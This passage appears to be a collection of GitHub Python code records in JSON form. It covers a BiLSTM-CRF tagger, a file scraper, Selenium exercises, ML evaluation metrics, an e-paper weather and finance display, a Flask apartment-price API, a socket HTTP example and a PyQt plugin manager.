space\n init_vvars = torch.full((1, self.tagset_size), -10000.)\n init_vvars[0][self.tag_to_ix[START_TAG]] = 0\n\n # forward_var at step i holds the viterbi variables for step i-1\n forward_var = init_vvars\n for feat in feats:\n bptrs_t = [] # holds the backpointers for this step\n viterbivars_t = [] # holds the viterbi variables for this step\n\n for next_tag in range(self.tagset_size):\n # next_tag_var[i] holds the viterbi variable for tag i at the\n # previous step, plus the score of transitioning\n # from tag i to next_tag.\n # We don't include the emission scores here because the max\n # does not depend on them (we add them in below)\n next_tag_var = forward_var + self.transitions[next_tag]\n best_tag_id = argmax(next_tag_var)\n bptrs_t.append(best_tag_id)\n viterbivars_t.append(next_tag_var[0][best_tag_id].view(1))\n # Now add in the emission scores, and assign 
forward_var to the set\n # of viterbi variables we just computed\n forward_var = (torch.cat(viterbivars_t) + feat).view(1, -1)\n backpointers.append(bptrs_t)\n\n # Transition to STOP_TAG\n terminal_var = forward_var + self.transitions[self.tag_to_ix[STOP_TAG]]\n best_tag_id = argmax(terminal_var)\n path_score = terminal_var[0][best_tag_id]\n\n # Follow the back pointers to decode the best path.\n best_path = [best_tag_id]\n for bptrs_t in reversed(backpointers):\n best_tag_id = bptrs_t[best_tag_id]\n best_path.append(best_tag_id)\n # Pop off the start tag (we dont want to return that to the caller)\n start = best_path.pop()\n assert start == self.tag_to_ix[START_TAG] # Sanity check\n best_path.reverse()\n return path_score, best_path\n\n def neg_log_likelihood(self, sentence, tags):\n feats = self._get_lstm_features(sentence)\n forward_score = self._forward_alg(feats)\n gold_score = self._score_sentence(feats, tags)\n return forward_score - gold_score\n\n def forward(self, sentence): # dont confuse this with _forward_alg above.\n # Get the emission scores from the BiLSTM\n lstm_feats = self._get_lstm_features(sentence)\n\n # Find the best path, given the features.\n score, tag_seq = self._viterbi_decode(lstm_feats)\n return score, tag_seq\n\n\ndef argmax(vec):\n # return the argmax as a python int\n _, idx = torch.max(vec, 1)\n return idx.item()\n\n\ndef prepare_sequence(seq, to_ix):\n idxs = [to_ix[w] for w in seq]\n return torch.tensor(idxs, dtype=torch.long)\n\n\n# Compute log sum exp in a numerically stable way for the forward algorithm\ndef log_sum_exp(vec):\n max_score = vec[0, argmax(vec)]\n max_score_broadcast = max_score.view(1, -1).expand(1, vec.size()[1])\n return max_score + \\\n torch.log(torch.sum(torch.exp(vec - max_score_broadcast)))\n","repo_name":"pabloac31/NLP-NER","sub_path":"utils/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":12231,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"}
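The module above references START_TAG and STOP_TAG without defining them, so anything importing BiLSTM_CRF_v2 needs those constants in scope; the PyTorch tutorial this class follows uses "<START>" and "<STOP>". A toy run under that assumption (hidden_dim must be even because it is halved for the bidirectional LSTM):

    import torch

    START_TAG, STOP_TAG = "<START>", "<STOP>"  # assumed values, must exist at module level
    word_to_ix = {"the": 0, "wall": 1, "street": 2}
    tag_to_ix = {"O": 0, "B-org": 1, START_TAG: 2, STOP_TAG: 3}

    model = BiLSTM_CRF_v2(len(word_to_ix), tag_to_ix, embedding_dim=8, hidden_dim=8)
    sentence = prepare_sequence(["the", "wall", "street"], word_to_ix)
    tags = torch.tensor([0, 1, 1], dtype=torch.long)

    loss = model.neg_log_likelihood(sentence, tags)  # training objective
    with torch.no_grad():
        score, tag_seq = model(sentence)             # Viterbi decode
    print(loss.item(), tag_seq)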
+{"seq_id":"72111216361","text":"import csv\nimport requests\nfrom bs4 import BeautifulSoup\nimport urllib.request\nimport os\nimport urllib.parse\nimport config\n\nrequest = urllib.request.Request(config.SCRAPE_LINK)\nresponse = urllib.request.urlopen(request)\nsoup = BeautifulSoup(response, \"html.parser\")\ndownloads_dir = os.path.dirname(os.path.abspath(__file__)) + '\\downloads'\n\nfor a in soup.findAll('a'):\n\tfilename = a['href'] \n\tfile_path = os.path.join(downloads_dir, filename)\n\t\n\tif not os.path.isfile(file_path):\n\t\turl = config.BASE_FILE + filename\n\t\tpath = urllib.parse.urlparse(url).path\n\t\text = os.path.splitext(path)[1]\n\t\tif ext in config.FILE_TYPES:\n\t\t\tfile = urllib.request.urlopen(url)\n\t\t\toutput = open(os.path.join(file_path),'wb')\n\t\t\toutput.write(file.read())\n\t\t\toutput.close()\n\t\t\tprint('Downloaded and Placed in /downloads: ' + filename)\n\telse:\n\t\tprint (filename + \" already located in downloads directory.\")\n","repo_name":"ishakm/scraper","sub_path":"scraper.py","file_name":"scraper.py","file_ext":"py","file_size_in_byte":886,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"}
+{"seq_id":"18614733102","text":"import time\nimport math\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nimport pyperclip\nimport os\ncurrent_dir = os.path.abspath(os.path.dirname(__file__))\nfile_path = os.path.join(current_dir, '1.txt')\n\n\ndef calc(x):\n return str(math.log(abs(12*math.sin(int(x)))))\n\n\nlink = \"http://suninjuly.github.io/file_input.html\"\n\nwith webdriver.Chrome() as browser:\n browser.get(link)\n browser.find_element(By.CSS_SELECTOR, \"[placeholder='Enter first name']\").send_keys(\"Ivan\")\n browser.find_element(By.CSS_SELECTOR, \"[placeholder='Enter last name']\").send_keys(\"Petrov\")\n browser.find_element(By.CSS_SELECTOR, \"[placeholder='Enter email']\").send_keys(\"Petrov@mail.ru\")\n\n browser.find_element(By.CSS_SELECTOR, \"[id='file']\").send_keys(file_path)\n browser.find_element(By.CLASS_NAME, \"btn-primary\").click()\n\n alert = browser.switch_to.alert\n addToClipBoard = alert.text.split(': ')[-1]\n pyperclip.copy(addToClipBoard)\n","repo_name":"Arzamasov-Zakhar/-stepik_auto_tests_course","sub_path":"2.2.8.py","file_name":"2.2.8.py","file_ext":"py","file_size_in_byte":965,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"36063730135","text":"# -*- codeing = utf-8 -*-\n# @Time : 2023-8-30 23:07\n# @Author : 刘永奇\n# @File : 84. 柱状图中最大的矩形.py\n# @Software : PyCharm\nclass Solution:\n def largestRectangleArea(self, heights: List[int]) -> int:\n s = []\n l = [-1] * len(heights)\n r = [len(heights)] * len(heights)\n\n for i in range(len(heights)):\n while len(s) != 0 and heights[i] <= heights[s[-1]]:\n r[s[-1]] = i\n s.pop()\n if len(s) != 0:\n l[i] = s[-1]\n s.append(i)\n res = 0\n for i in range(len(heights)):\n res = max(res, (heights[i] * (r[i] - l[i] - 1)))\n return res\n","repo_name":"xs-web-lyq/LeetCode","sub_path":"Python/84. 柱状图中最大的矩形.py","file_name":"84. 柱状图中最大的矩形.py","file_ext":"py","file_size_in_byte":680,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"70674562919","text":"from sklearn.metrics import confusion_matrix\nfrom sklearn.metrics import accuracy_score\nfrom sklearn.metrics import f1_score\nfrom sklearn.metrics import recall_score\nfrom sklearn.metrics import precision_score\nfrom sklearn.metrics import roc_auc_score\nfrom sklearn.metrics import auc\nimport math\nimport numpy as np\n\n\ndef get_confusion_matrix(y_true, y_pred) -> tuple:\n \"\"\"\n Returns tp, tn, fp, fn\n\n :param y_true: True labels\n :param y_pred: Predictions\n :return: (tp, tn, fp, fn)\n \"\"\"\n tn, fp, fn, tp = confusion_matrix(y_true, y_pred).ravel()\n return tp, tn, fp, fn\n\n\ndef get_accuracy(y_true, y_pred) -> float:\n \"\"\"\n Returns the accuracy score\n\n :param y_true: True labels\n :param y_pred: Predictions\n :return: Accuracy score\n \"\"\"\n # We need to cast to np.array so that .shape exists\n if isinstance(y_true, list):\n y_true = np.array(y_true)\n if isinstance(y_pred, list):\n y_pred = np.array(y_pred)\n\n if len(y_true.shape) > 1:\n y_true = y_true.argmax(axis=1)\n if len(y_pred.shape) > 1:\n y_pred = y_pred.argmax(axis=1)\n\n return accuracy_score(y_true, y_pred)\n\n\ndef get_f1_score(y_true, y_pred) -> float:\n \"\"\"\n Returns the F-1 score\n\n :param y_true: True labels\n :param y_pred: Predictions\n :return: F-1 score\n \"\"\"\n if len(np.unique(y_true)) > 2:\n average = None\n else:\n average = 'binary'\n return f1_score(y_true, y_pred, average=average)\n\n\ndef get_recall(y_true, y_pred) -> float:\n \"\"\"\n Returns the recall score\n\n :param y_true: True labels\n :param y_pred: Predictions\n :return: Recall score\n \"\"\"\n if len(np.unique(y_true)) > 2:\n average = None\n else:\n average = 'binary'\n return recall_score(y_true, y_pred, average=average)\n\n\ndef get_precision(y_true, y_pred) -> float:\n \"\"\"\n Returns the precision.\n\n :param y_true: True labels\n :param y_pred: Predictions\n :return: Precision\n \"\"\"\n if len(np.unique(y_true)) > 2:\n average = None\n else:\n average = 'binary'\n return precision_score(y_true, y_pred, average=average)\n\n\ndef get_pf(y_true, y_pred) -> float:\n \"\"\"\n Returns the false alarm rate\n\n :param y_true: True labels\n :param y_pred: Predictions\n :return: False alarm rate\n \"\"\"\n _, tn, fp, fn = get_confusion_matrix(y_true, y_pred)\n return 1. * fp / (fp + tn) if fp + tn != 0 else 0\n\n\ndef get_pd_pf(y_true, y_pred) -> float:\n \"\"\"\n Returns the value of recall - false alarm rate.\n\n :param y_true: True labels\n :param y_pred: Predictions\n :return: Recall - false alarm rate\n \"\"\"\n return get_recall(y_true, y_pred) - get_pf(y_true, y_pred)\n\n\ndef get_roc_auc(y_true, y_pred) -> float:\n \"\"\"\n Returns the area under the pd/pf curve\n\n :param y_true: True labels\n :param y_pred: Predictions\n :return: AUC score\n \"\"\"\n return roc_auc_score(y_true, y_pred)\n\n\ndef get_d2h(y_true, y_pred) -> float:\n \"\"\"\n Returns the distance to heaven metric\n\n :param y_true: True labels\n :param y_pred: Predictions\n :return: d2h score\n \"\"\"\n return 1. / math.sqrt(2) - math.sqrt(get_pf(y_true, y_pred) ** 2 + (1. - get_recall(y_true, y_pred)) ** 2) / math.sqrt(2)\n\n\ndef get_d2h2(y_true, y_pred) -> float:\n \"\"\"\n Returns the distance to heaven metric\n\n :param y_true: True labels\n :param y_pred: Predictions\n :return: d2h score\n \"\"\"\n return 1. / math.sqrt(2) - math.sqrt(2.*get_pf(y_true, y_pred) ** 2 + (1. 
- get_recall(y_true, y_pred)) ** 2) / math.sqrt(2)\n\n\ndef get_ifa(y_true, y_pred) -> float:\n ifa = 0\n actual_results = np.asarray(y_true)\n predicted_results = np.asarray(y_pred)\n index = 0\n for i, j in zip(actual_results, predicted_results):\n if ((i == \"yes\") and (j == \"yes\")) or ((i == 1) and (j == 0)):\n break\n elif ((i == \"no\") and (j == \"yes\")) or ((i == 0) and (j == 1)):\n ifa += 1\n index += 1\n return ifa\n\n\ndef get_g1_score(y_true, y_pred) -> float:\n \"\"\"\n Returns the G-1 score\n\n :param y_true: True labels\n :param y_pred: Predictions\n :return: G-1 score\n \"\"\"\n tp, tn, fp, fn = get_confusion_matrix(y_true, y_pred)\n pf = 1. * fp / (fp + tn) if fp + tn != 0 else 0\n recall = 1. * tp / (tp+fn) if tp + fn != 0 else 0\n g_score = (2 * recall * (1 - pf)) / (recall + 1 - pf) if recall + 1 - pf != 0 else 0\n return g_score\n\n\ndef get_popt20(data) -> float:\n \"\"\"\n Get popt20 score.\n\n :param data: Pandas DataFrame with data. Must contain columns \"bug\", \"loc\", and \"prediction\".\n :return: popt20 score\n \"\"\"\n def subtotal(x):\n xx = [0]\n for _, t in enumerate(x):\n xx += [xx[-1] + t]\n return xx[1:]\n\n def get_recall_(true):\n total_true = float(len([i for i in true if i == 1]))\n hit = 0.0\n recall = []\n for i, el in enumerate(true):\n if el == 1:\n hit += 1\n recall += [hit / total_true if total_true else 0.0]\n return recall\n\n data.sort_values(by=[\"bug\", \"loc\"], inplace=True)\n x_sum = float(sum(data['loc']))\n x = data['loc'].apply(lambda t: t / x_sum)\n xx = subtotal(x)\n\n # get AUC_optimal\n yy = get_recall_(data['bug'].values)\n xxx = [i for i in xx if i <= 0.2]\n yyy = yy[:len(xxx)]\n try:\n s_opt = round(auc(xxx, yyy), 3)\n except ValueError:\n s_opt = 0\n\n # get AUC_worst\n xx = subtotal(x[::-1])\n yy = get_recall_(data['bug'][::-1].values)\n xxx = [i for i in xx if i <= 0.2]\n yyy = yy[:len(xxx)]\n try:\n s_wst = round(auc(xxx, yyy), 3)\n except:\n s_wst = 0\n\n # get AUC_prediction\n data.sort_values(by=[\"prediction\", \"loc\"], ascending=[0, 1], inplace=True)\n x = data['loc'].apply(lambda t: t / x_sum)\n xx = subtotal(x)\n yy = get_recall_(data['bug'].values)\n xxx = [k for k in xx if k <= 0.2]\n yyy = yy[:len(xxx)]\n try:\n s_m = round(auc(xxx, yyy), 3)\n except ValueError:\n return 0\n\n popt = (s_m - s_wst) / (s_opt - s_wst)\n return round(popt, 3)\n","repo_name":"yrahul3910/raise","sub_path":"raise_utils/metrics/impl.py","file_name":"impl.py","file_ext":"py","file_size_in_byte":6080,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
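A small end-to-end check of the binary metrics on toy labels. With one true positive, one false positive and two false negatives out of six samples, pf = 1/3 and recall = 1/3, and the derived scores follow directly:

    y_true = [1, 1, 0, 0, 0, 1]  # hypothetical labels
    y_pred = [1, 0, 0, 0, 1, 0]

    print(get_confusion_matrix(y_true, y_pred))  # (tp, tn, fp, fn) = (1, 2, 1, 2)
    print(get_pf(y_true, y_pred))                # fp/(fp+tn) = 1/3
    print(get_recall(y_true, y_pred))            # tp/(tp+fn) = 1/3
    print(get_g1_score(y_true, y_pred))          # (2*(1/3)*(2/3)) / (1/3 + 2/3) = 4/9
    print(get_d2h(y_true, y_pred))               # distance-to-heaven variant of the same pair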
+{"seq_id":"22284175474","text":"#!/usr/bin/env python\n#encoding: utf-8\nimport sys\nimport os\nimport time\nimport datetime\nimport json\nimport requests\nimport re\nimport struct\nfrom StringIO import StringIO\nfrom PIL import Image, ImageDraw, ImageFont\n\ncolor_white = (255, 255, 255)\ncolor_black = (0, 0, 0)\ncolor_red = (227, 178, 4)\n\nimage_width = 640\nimage_height = 384\n\nfont_path = os.path.dirname(os.path.abspath(__file__)) + '/font.ttc'\n\ndef current_datetime():\n m = ['一', '二', '三', '四', '五', '六', '日']\n n = datetime.datetime.now()\n return (n.strftime('%m-%d %H:%M 星期') + m[n.weekday()]).decode('utf-8')\n\ndef fetch_finance():\n url = 'https://hq.sinajs.cn/rn=%d&list=gb_dji,gb_ixic,gb_inx,s_sh000001,s_sz399001,USDCNY' % int(time.time())\n headers = {\n 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36',\n }\n r = requests.get(url, headers=headers)\n text = r.text\n matches = re.findall(r'var ([^=]+)=\"([^\"]+)\"', text, re.M)\n\n result = {}\n for v in matches:\n result[v[0]] = v[1].split(',')\n\n return result\n\ndef draw_finance(draw, item, pos):\n font = ImageFont.truetype(font_path, 20)\n\n left = pos[0]\n top = pos[1] + 10\n text = item[0]\n draw.text((left, top), text, font=font, fill=color_black)\n w, h = draw.textsize(text, font=font)\n w2, h2 = draw.textsize(u'四个字符', font=font)\n if w < w2:\n w = w2\n\n left += w + 10\n text = u'%.2f' % item[1]\n w, h = draw.textsize(text, font=font)\n draw.text((left, top), text, font=font, fill=color_black)\n\n bg_color = None\n txt_color = None\n left += w + 10\n\n if item[2] > 0:\n bg_color = color_red\n txt_color = color_black\n text = u'+%.2f%%' % item[2]\n else:\n bg_color = color_black\n txt_color = color_white\n text = u'-%f%' % item[2]\n\n w, h = draw.textsize(text, font=font)\n draw.rectangle([left-2, top-2, left + w + 2, top + h + 2], fill=bg_color)\n draw.text((left, top), text, font=font, fill=txt_color)\n\ndef load_icon(url):\n r = requests.get(url)\n png = Image.open(StringIO(r.content))\n background = Image.new(\"RGB\", png.size, (255, 255, 255))\n background.paste(png, mask=png.split()[3]) # 3 is the alpha channel\n return background\n\ndef draw_weather(image, draw, day, pos, width):\n is_today = datetime.datetime.now().strftime('%m-%d') == day['date']\n\n font = ImageFont.truetype(font_path, 24)\n\n left = pos[0]\n top = pos[1] + 10\n text = day['date']\n w, h = draw.textsize(text, font=font)\n draw.text(((width-w)/2 + left, top), text, font=font, fill=color_black)\n\n top += h + 5\n text = day['weekday']\n w, h = draw.textsize(text, font=font)\n draw.text(((width-w)/2 + left, top), text, font=font, fill=color_black)\n\n top += h + 5\n if is_today:\n icon = load_icon(day['day']['icon'])\n icon_margin = (width - icon.size[0])/2\n image.paste(icon, (icon_margin + left, top))\n else:\n icon = load_icon(day['day']['icon'])\n icon_margin = width/2 - icon.size[0] - 10\n image.paste(icon, (icon_margin + left, top))\n\n icon = load_icon(day['night']['icon'])\n image.paste(icon, (left + width/2 + 10, top))\n\n font = ImageFont.truetype(font_path, 20)\n text = day['day']['temp'] + u'℃'\n if not is_today:\n text += ' / ' + day['night']['temp'] + u'℃'\n top += h + 30\n w, h = draw.textsize(text, font=font)\n draw.text(((width-w)/2 + left, top), text, font=font, fill=color_black)\n\n font = ImageFont.truetype(font_path, 16)\n text = day['wind']\n top += h + 5\n w, h = draw.textsize(text, font=font)\n draw.text(((width-w)/2 + left, top), 
text, font=font, fill=color_black)\n\n font = ImageFont.truetype(font_path, 24)\n text = day['aq'] + u' ' + day['aq_desc']\n top += h + 5\n w, h = draw.textsize(text, font=font)\n draw.text(((width-w)/2 + left, top), text, font=font, fill=color_black)\n\n\ndef draw_board():\n image = Image.new('RGB', (image_width, image_height), color_white)\n draw = ImageDraw.Draw(image)\n\n font = ImageFont.truetype(font_path, 60)\n\n line = current_datetime()\n w, h = draw.textsize(line, font=font)\n draw.text(((image_width-w)/2,10), line, font=font, fill=color_black)\n\n draw.line([(0, 80),(image_width, 80)], fill=color_black, width=1)\n\n json_path = os.path.dirname(os.path.abspath(__file__)) + '/weather.json'\n weather_info = json.load(open(json_path))\n weather_info['days'][0]['day']['temp'] = weather_info['current_temp']\n weather_info['days'][0]['wind'] = weather_info['current_wind']\n weather_info['days'][0]['aq'] = weather_info['current_aq']\n weather_info['days'][0]['aq_desc'] = weather_info['current_aq_desc']\n\n for i in xrange(4):\n width = image_width / 4\n draw_weather(image, draw, weather_info['days'][i], (0 + i * width, 80), width)\n if i != 3:\n draw.line([((i+1)*width, 80),((i+1)*width, 80+200)], fill=color_black, width=1)\n\n draw.line([(0, 80+200),(image_width, 80+200)], fill=color_black, width=1)\n\n finance = fetch_finance()\n draw_finance(draw, (u'道琼斯', float(finance['hq_str_gb_dji'][1]), float(finance['hq_str_gb_dji'][2])), (20, 280))\n draw_finance(draw, (u'纳斯达克', float(finance['hq_str_gb_ixic'][1]), float(finance['hq_str_gb_ixic'][2])), (image_width/2, 280))\n\n draw_finance(draw, (u'上证指数', float(finance['hq_str_s_sh000001'][1]), float(finance['hq_str_s_sh000001'][3])), (20, 310))\n draw_finance(draw, (u'深证成指', float(finance['hq_str_s_sz399001'][1]), float(finance['hq_str_s_sz399001'][3])), (image_width/2, 310))\n\n c = float(finance['hq_str_USDCNY'][8])\n o = float(finance['hq_str_USDCNY'][3])\n draw_finance(draw, (u'美元兑人民币', c, (c-o)/o*100), (20, 340))\n\n return image\n\ndef convert_image(im, output_path):\n output_fp = open(output_path, \"w\")\n\n w, h = im.size\n size = w*h\n\n i = 0\n while i < size:\n b = 0x00\n\n for j in xrange(4):\n idx = i + j\n if idx < size:\n px = im.getpixel((idx%w, idx/w))\n if px[0] > 230 and px[1] > 230 and px[2] > 230: #white\n b |= 0x01 << ((3 - j)*2)\n elif px[0] > 200:\n b |= 0x02 << ((3 - j)*2)\n else:\n break\n\n output_fp.write(struct.pack(\"B\", b))\n\n i += 4\n\n\n\nif __name__ == '__main__':\n image = draw_board()\n #image.save(\"./board.bmp\")\n convert_image(image, sys.argv[1])\n","repo_name":"emptyhua/epaper_board","sub_path":"draw.py","file_name":"draw.py","file_ext":"py","file_size_in_byte":6573,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"18"}
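The packing in convert_image maps four pixels to one byte, two bits each: white (all channels above 230) becomes 01, light grey (red channel above 200) becomes 10, and dark stays 00. Note that the dark case hits `break`, so a dark pixel also forces every later pixel in the same byte to 00; if that is not intended, `continue` would keep them. A worked byte, assuming `continue` semantics:

    # pixels: white, grey, dark, white -> 2-bit fields 01, 10, 00, 01
    b = (0x01 << 6) | (0x02 << 4) | (0x00 << 2) | (0x01 << 0)
    print(bin(b), hex(b))  # 0b1100001 0x61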
+{"seq_id":"35834921429","text":"import os\n\nfrom dotenv import load_dotenv\n\nfrom bot_app import screenshots\n\ndotenv_path = os.path.join(os.path.dirname(os.path.dirname(__file__)), '.env')\n\nif os.path.exists(dotenv_path):\n load_dotenv(dotenv_path)\n\nBOT_TOKEN = os.environ.get('BOT_TOKEN', '')\n\nSPLASH_PORT = os.environ.get('SPLASH_PORT', '8050')\n\nSAVE_PATH = screenshots.get_dir_path()\n\nFULL_PAGE = 1\n","repo_name":"Iftor/screenshoter-bot","sub_path":"bot_app/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":370,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"538702366","text":"# Importando as bibliotecas\nfrom flask import Flask, request, render_template\nfrom flask_restful import Api\nfrom joblib import load\n\n# Iniciando o Flask e especificando o repositorio dos templates\napp = Flask(__name__, template_folder=\"template\")\n\nimport preprocessamento\n\n# Iniciando a API\napi = Api(app)\n\n# Carregando os modelos treinados\nmodelo_aluguel = load('modelo_alugueis.joblib')\nmodelo_venda = load('modelo_vendas.joblib')\n\n# Rota padrão para home\n@app.route('/')\ndef home():\n return render_template('home.html') # Rendezirar o template\n\n# Rota 'predict' aceita GET request\n@app.route('/predict', methods=['GET'])\ndef predict_price():\n try:\n negotiation_type = int(request.args.get('negotiation_type')) # Obter os parâmetros para Negotiation_Type\n condo = int(request.args.get('condo')) # Obter os parâmetros para Condo\n size = int(request.args.get('size')) # Obter os parâmetros para Size\n rooms = int(request.args.get('rooms')) # Obter os parâmetros para Rooms\n toilets = int(request.args.get('toilets')) # Obter os parâmetros para Toilets\n suites = int(request.args.get('suites')) # Obter os parâmetros para Suites\n parking = int(request.args.get('parking')) # Obter os parâmetros para Parking\n elevator = int(request.args.get('elevator')) # Obter os parâmetros para Elevator\n furnished = int(request.args.get('furnished')) # Obter os parâmetros para Furnished\n swimming_pool = int(request.args.get('swimming_pool')) # Obter os parâmetros para Swimming_Pool\n new = int(request.args.get('new')) # Obter os parâmetros para New\n bairro = request.args.get('bairro') # Obter os parâmetros para Bairro\n\n bairros_sem_aluguel = ['District_Perus', 'District_São Domingos']\n\n # Separando os modelos para aluguel e venda\n if negotiation_type == 0:\n if bairro in bairros_sem_aluguel:\n previsao = 'O bairro informado não possui nenhuma informação no banco de dados referente ao preço de ' \\\n 'aluguel.'\n return render_template('output2.html', previsao=previsao)\n else:\n # Obtendo a previsão\n previsao = modelo_aluguel.predict(preprocessamento.tratamento(negotiation_type, condo, size, rooms,\n toilets, suites, parking, elevator,\n furnished, swimming_pool, new, bairro))\n # Exibindo a previsão na página web output\n return render_template('output.html', previsao=previsao)\n\n elif negotiation_type == 1:\n # Obtendo a previsão\n previsao = round(modelo_venda.predict(preprocessamento.tratamento(negotiation_type, condo, size, rooms,\n toilets, suites, parking, elevator,\n furnished, swimming_pool, new, bairro)))\n # Exibindo a previsão na página web output\n return render_template('output.html', previsao=previsao)\n except:\n 'Error'\n\n# Executar o servidor Flask\nif(__name__== '__main__'):\n app.run()\n","repo_name":"octavianosilva/API_Apartamentos_SP","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3329,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"34838305943","text":"\"\"\" A simple web browser \"\"\"\r\n\r\nimport socket\r\n# print(help(socket))\r\n\r\nmy_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\nmy_sock.connect((\"data.pr4e.org\", 80))\r\n\r\nreq = \"GET http://data.pr4e.org/romeo.txt HTTP/1.0\\r\\n\\r\\n\"\r\nreq_encoded = req.encode()\r\nmy_sock.send(req_encoded)\r\n\r\nwhile True:\r\n data = my_sock.recv(512)\r\n if len(data) < 1:\r\n break\r\n print(data.decode())\r\n\r\nmy_sock.close()\r\n","repo_name":"danielOuattara/Python_For_EveryBody_py4e_Charles_Severance","sub_path":"13_Python_Network/script_03_using_http.py","file_name":"script_03_using_http.py","file_ext":"py","file_size_in_byte":419,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"31849950045","text":"import os\nimport shutil\nimport sys\n\nfrom PyQt6 import QtWidgets, QtGui, QtCore\nfrom pathlib import Path\nfrom .control_plugin_collection import PluginCollection\n\n\nclass PluginManager(object):\n def __init__(self, main_control):\n super().__init__()\n self.main_control = main_control\n self.plugin = PluginCollection(\"plugins\")\n self.apps_activated = None\n self.index = None\n self.init_available_plugin()\n self.connect_to_event()\n\n def connect_to_event(self):\n self.main_control.ui.add_plugins_button.clicked.connect(self.install_new_plugin)\n self.main_control.ui.delete_plugins_button.clicked.connect(self.action_delete_apps)\n self.main_control.ui.close_plugin_button.clicked.connect(self.main_control.back_to_home)\n self.main_control.ui.help_plugins_button.clicked.connect(self.help_menu_plugin)\n\n def init_available_plugin(self):\n for i in range(self.main_control.ui.layout_application.count()):\n self.main_control.ui.layout_application.itemAt(i).widget().close()\n\n for i in range(len(self.plugin.name_application)):\n icon = self.plugin.get_icon_(i)\n button = self.add_btn_apps_plugin(icon, self.plugin.name_application[i])\n button.clicked.connect(self.open_plugin_apps)\n self.main_control.ui.layout_application.addWidget(button)\n\n def install_new_plugin(self):\n options = QtWidgets.QFileDialog.Option.DontUseNativeDialog\n dir_plugin = QtWidgets.QFileDialog.getExistingDirectory(None,\n 'Select Application Folder', \"../plugin_store\", options)\n if dir_plugin:\n original = dir_plugin\n name_plug = os.path.basename(os.path.normpath(original))\n path_file = os.path.dirname(os.path.realpath(__file__))\n target = path_file + '/plugins/'\n name_exist = Path(target + name_plug)\n if name_exist.exists():\n QtWidgets.QMessageBox.warning(None, \"Warning !!\", \"Plugins already exist!!\")\n else:\n listApp = self.plugin.name_application\n self.main_control.model.copy_directory(original, target)\n self.plugin.reload_plugins()\n newList = self.plugin.name_application\n name = [item for item in newList if item not in listApp]\n\n def listToString(listIn):\n return \" \".join(listIn)\n\n index = newList.index(listToString(name))\n icon = self.plugin.get_icon_(index)\n button = self.add_btn_apps_plugin(icon, self.plugin.name_application[index])\n button.clicked.connect(self.open_plugin_apps)\n self.main_control.ui.layout_application.addWidget(button)\n self.pop_up_message_box(\"Plugins was successfully added!!\")\n\n def refresh_theme_widget(self):\n if self.index is not None:\n self.plugin.change_theme(self.index)\n\n def open_plugin_apps(self):\n button = self.main_control.sender()\n index = self.plugin.name_application.index(button.objectName())\n if index != self.index:\n self.index = self.plugin.name_application.index(button.objectName())\n self.main_control.ui.delete_plugins_button.show()\n self.main_control.ui.close_plugin_button.show()\n for i in range(self.main_control.ui.layout_plugin.count()):\n self.main_control.ui.layout_plugin.itemAt(i).widget().close()\n\n widget = self.plugin.get_widget(self.index, self.main_control.model)\n self.main_control.ui.layout_plugin.addWidget(widget)\n self.main_control.ui.widget_container_content.setCurrentIndex(1)\n self.main_control.ui.frame_btn_moilapp.hide()\n self.main_control.ui.frame_button_view.hide()\n self.apps_activated = button.objectName()\n\n @classmethod\n def add_btn_apps_plugin(cls, icon_, name):\n button = QtWidgets.QPushButton()\n button.setObjectName(name)\n sizePolicy = 
QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Policy.Minimum, QtWidgets.QSizePolicy.Policy.Expanding)\n sizePolicy.setHorizontalStretch(0)\n sizePolicy.setVerticalStretch(0)\n sizePolicy.setHeightForWidth(button.sizePolicy().hasHeightForWidth())\n button.setSizePolicy(sizePolicy)\n button.setMinimumSize(QtCore.QSize(40, 25))\n button.setMaximumSize(QtCore.QSize(35, 16777215))\n if icon_ is not None:\n icon = QtGui.QIcon(icon_)\n button.setIcon(icon)\n button.setIconSize(QtCore.QSize(30, 30))\n return button\n\n def action_delete_apps(self):\n index = self.plugin.name_application.index(self.apps_activated)\n self.delete_apps(index)\n\n def delete_apps(self, index):\n \"\"\"\n Delete selected application from the list.\n\n Returns:\n None.\n \"\"\"\n name = self.plugin.name_application[index]\n path = self.plugin.path_folder[index]\n path = path.split(\".\")[1]\n\n path_file = os.path.dirname(os.path.realpath(__file__))\n path = path_file + '/plugins/'+path\n\n reply = QtWidgets.QMessageBox.question(None, 'Message',\n \"Are you sure want to delete \\n\" +\n name + \" application ?\\n\",\n QtWidgets.QMessageBox.StandardButton.Yes |\n QtWidgets.QMessageBox.StandardButton.No,\n QtWidgets.QMessageBox.StandardButton.No)\n\n if reply == QtWidgets.QMessageBox.StandardButton.Yes:\n shutil.rmtree(path, ignore_errors=True)\n self.plugin.reload_plugins()\n self.init_available_plugin()\n self.pop_up_message_box(\"Plugins was successfully deleted !!\")\n self.main_control.back_to_home()\n\n def help_menu_plugin(self):\n if self.main_control.ui.widget_container_content.currentIndex() == 0:\n message = \"Help menu plugin under development \\n\" \\\n \"we Will inform you after finish!!\\n\"\n\n else:\n print(self.plugin.get_description(self.index))\n message = \"Help menu plugin under development \\n\" \\\n \"we Will inform you after finish!!\\n\\n\" \\\n \"Note App: \" + self.plugin.get_description(self.index)\n self.pop_up_message_box(message)\n\n @classmethod\n def pop_up_message_box(cls, message=\"\"):\n msg = QtWidgets.QMessageBox()\n 